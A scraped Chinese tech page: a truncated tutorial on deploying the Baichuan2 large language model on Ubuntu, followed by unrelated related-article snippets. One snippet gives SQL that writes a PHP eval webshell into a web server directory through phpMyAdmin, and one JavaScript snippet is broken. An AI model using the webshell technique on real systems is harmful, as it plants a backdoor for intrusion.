ubuntu从零部署baichuan2大模型

目录

一、百川2(Baichuan 2)模型介绍

二、资源需求

三、安装部署

本文从实战过程中整理一份从零开始的搭建开源大模型的部署文档,供大家学习交流。

部署大模型版本为baichuan2-13B chat,如果需要量化可下载量化版本 。

一、百川2(Baichuan 2)模型介绍

首先先简单介绍一下百川推出的两款开源模型:Baichuan2-13BBaichuan2-7B

Baichuan 2 是百川智能推出的新一代开源大语言模型,采用 2.6 万亿 Tokens 的高质量语料训练。并且在多个权威的中文、英文和多语言的通用领域 benchmark 上取得同尺寸最佳效果。这次发布包含有 7B、13B 的 Base 和 Chat 版本,而且提供了 Chat 版本的 4bits 量化。

以上两个模型都是在Hugging FaceGitHubModel Scope平台上发布的,你可以在这些平台上找到更多的信息和下载模型。

所有版本对学术研究完全开放。同时,开发者通过邮件申请并获得官方商用许可后,即可免费商用

Baichuan2-13B

  • 模型规模:Baichuan2-13B模型包含130亿参数。
  • 特点
    • Baichuan-13B在 Baichuan-7B 的基础上进一步扩大参数量到 130 亿,具有更大的参数规模,它可以捕捉到更多的信息和细节。
    • Baichuan2-13B在多项经典的NLP任务中取得了世界领先的效果,尤其是在零样本任务中表现突出,具有更强的泛化能力和适应性,它可以在不经过特定任务训练的情况下,直接处理新的语言任务。
    • 为了满足用户不同的部署需求,百川还提供了Chat版本的4bits量化模型。

Baichuan2-7B

  • 模型规模:Baichuan2-7B模型包含70亿参数。
  • 特点
    • 虽然比13B小,但仍然是一个大型模型,拥有70亿参数。
    • 与13B模型类似,7B模型也提供了Base和Chat两个版本。
    • 在中文 C-EVAL 的评测中,baichuan-7B 的综合评分达到了 42.8 分,超过了 ChatGLM-6B 的 38.9 分,甚至比某些参数规模更大的模型还要出色。

二、资源需求

模型文件类型

7B模型,又分为基座,对齐,对齐的4bits量化模型3个子类型。

13B模型,又分为基座,对齐,对齐的4bits量化模型3个子类型。

一共6种类型,可根据自身情况选择。

推理的GPU资源要求

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/748399.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

别再手动拼接 SQL 了,MyBatis 动态 SQL 写法应有尽有,建议收藏!

一、MyBatis动态 sql 是什么 动态 SQL 是 MyBatis 的强大特性之一。在 JDBC 或其它类似的框架中,开发人员通常需要手动拼接 SQL 语句。根据不同的条件拼接 SQL 语句是一件极其痛苦的工作。 例如,拼接时要确保添加了必要的空格,还要注意去掉…

[SaaS] 淘宝设AI

“淘宝设计AI” 让国际大牌造世界双11超级品牌 超级发布https://mp.weixin.qq.com/s/xFVDARQHxlweKAYG91DtYw下面是一个完整的品牌营销海报设计流程,AIGC起到了巨大作用,但是仍然很难去一步解决这个问题,还是逐步修改的一个过程。 Midjouner…

分布式与集群,二者区别是什么?

🐓分布式 分布式系统是由多个独立的计算机节点组成的系统,这些节点通过网络协作完成任务。每个节点都有自己的独立计算能力和存储能力,可以独立运行。分布式系统的目标是提高系统的可靠性、可扩展性和性能。 分布式服务包含的技术和理论 负…

LabVIEW多表位数字温湿度计图像识别系统

LabVIEW多表位数字温湿度计图像识别系统 解决数字温湿度计校准过程中存在的大量需求和长时间校准问题,通过LabVIEW开发平台设计了一套适用于20多个表位的数字温度计图像识别系统。该系统能够通过图像采集、提取和处理,进行字符训练,从而实现…

胸闷气短、失眠焦虑、植物神经紊乱治疗!

植物神经紊乱是一种内脏功能失调的综合征,是由于社压会力、工作压力、生活压力等等因素而导致的一种神经类疾病。长期患有这个疾病会给患者的生活、工作以及学习带来很严重的影响和危害。 有很多患有植物神经紊乱的患者,各种各样的症状的患者被所轻或重的…

中小企业的智能化,不能再拖了!

在当今时代,新质生产力已然成为了国内最热门的话题。它代表着先进生产力的涌现和发展,正逐渐成为推动国家经济社会持续发展的核心力量。今年的两会更是将“新质生产力”写入政府工作报告,并将其列为2024年政府工作十大任务之首,足…

【JS】parseInt与Math.floor的区别

获取两数区间随机整数的函数如下 function getRandom(min,max){return Math.floor(Math.random() * (max - min) min) }这个函数中,只可以使用Math.random,parseInt会出问题,二者虽然都是取整,但又有一些区别。 parseInt是「向…

力扣大厂热门面试算法题 30-32

30. 串联所有单词的子串,31. 下一个排列 ,32. 最长有效括号,每题做详细思路梳理,配套Python&Java双语代码, 2024.03.15 可通过leetcode所有测试用例。 目录 30. 串联所有单词的子串 解题思路 完整代码 Java …

Sora学习手册

一,基本介绍 在2024年2月16日,Open AI宣布推出全新的生成式人工智能模型"Sora"。据了解,通过文 本指令,Sora 可以直接输出长达60秒的视频,并且包含高度细致的背景、复杂的多角度镜头,以 及富有情感的多个角色。 这意味…

【Java】String字符串及常用API

目录 一、字符串 1、 字符串是常量,不可改变 2、创建字符串的方式: 3、StringBuilder和StringBuffer 二、String字符串常用方法 1、以指定字符串开头或结尾startsWith、endWith 2、字符串截取 substring(beginIndex,endIndex)/substring(beginInd…

算法笔记 连载中。。。

HashMap&#xff08;会根据key值自动排序&#xff09; HashMap<String, Integer> hash new HashMap<>() hash.put(15,18) hash.getOrDefault(ts, -1) //如果ts(key)存在&#xff0c;返回对应的value 否则返回-1 hashMap1.get(words1[i])1会报错&#xff0c;因…

AcWing 848. 有向图的拓扑序列

#include<iostream> #include<cmath> #include<queue> #include<cstring> #include<cstdlib> #include<algorithm> using namespace std; const int N1e510; int n,m,a,b; int e[N],ne[N],h[N],idx; int d[N],top[N],cnt1;//top是拓扑排序…

Linux学习笔记:什么是文件描述符

什么是文件描述符 C语言的文件接口文件的系统调用什么是文件描述符,文件描述符为什么是int类型?为什么新打开的文件的文件描述符不是从0开始? 文件描述符 fd (file descriptor) C语言的文件接口 当时学习C语言的时候,学习了文件接口 具体可以查看之前的文章: 链接:C语言的文…

flask库

文章目录 flask库1. 基本使用2. 路由路径和路由参数3. 请求跳转和请求参数4. 模板渲染1. 模板变量2. 过滤器3. 测试器 5. 钩子函数与响应对象 flask库 flask是python编写的轻量级框架&#xff0c;提供Werkzeug&#xff08;WSGI工具集&#xff09;和jinjia2&#xff08;渲染模板…

【基于PSINS】误差计算函数

输入真值 (参考值)、对比量、待比较值,输出误差的最大值、平均值、标准差的函数 程序源码 function [err] = EV_error_output(out_flag,avp_flag,avp,varargin) % draw_flag:以字符串的形式输入绘图的数据,eg:["EKF","UKF"] % avp:基准 % avp_:…

【PyTorch】基础学习:在Pycharm等IDE中打印或查看Pytorch版本信息

【PyTorch】基础学习&#xff1a;在Pycharm等IDE中打印或查看Pytorch版本信息 &#x1f308; 个人主页&#xff1a;高斯小哥 &#x1f525; 高质量专栏&#xff1a;Matplotlib之旅&#xff1a;零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程&#x1…

机器硬件命令

一、查看机器核数 有以下几种方法 1、lscpu命令 lscpu命令可以显示关于CPU的信息&#xff0c;包括核数、线程数等。在终端中输入以下命令即可查看CPU核数&#xff1a;该命令会输出CPU每个物理插槽的核数。 lscpu | grep "Core(s) per socket" | awk {print $NF} …

PHPadmin写shell的方法

一、常规导入 shell 的操作创建数据表导出 shell CREATE TABLE mysql.shadow9 (content TEXT NOT NULL ); INSERT INTO mysql.shadow9 (content ) VALUES (‘<?php eval($_POST[pass]);?>’); SELECT content FROM shadow9 INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.…

C++中实现String类

String类实现 概述示例开发环境代码运行结果 注意 概述 本文主要记录自己实现一个String类中的部分功能。 示例 开发环境 Windows下Visual Studio 2019。 代码 MyString.h #pragma once #include <iostream>class MyString{ public:MyString();MyString(char *p);…

github登录时解决2FA问题

使用Edge浏览器下载插件 https://microsoftedge.microsoft.com/addons/detail/authenticator-2fa-client/ocglkepbibnalbgmbachknglpdipeoio 下载后弹框会显示是否添加&#xff0c;添加。如下&#xff1a; Chrome下 https://chrome.google.com/webstore/detail/authenticator…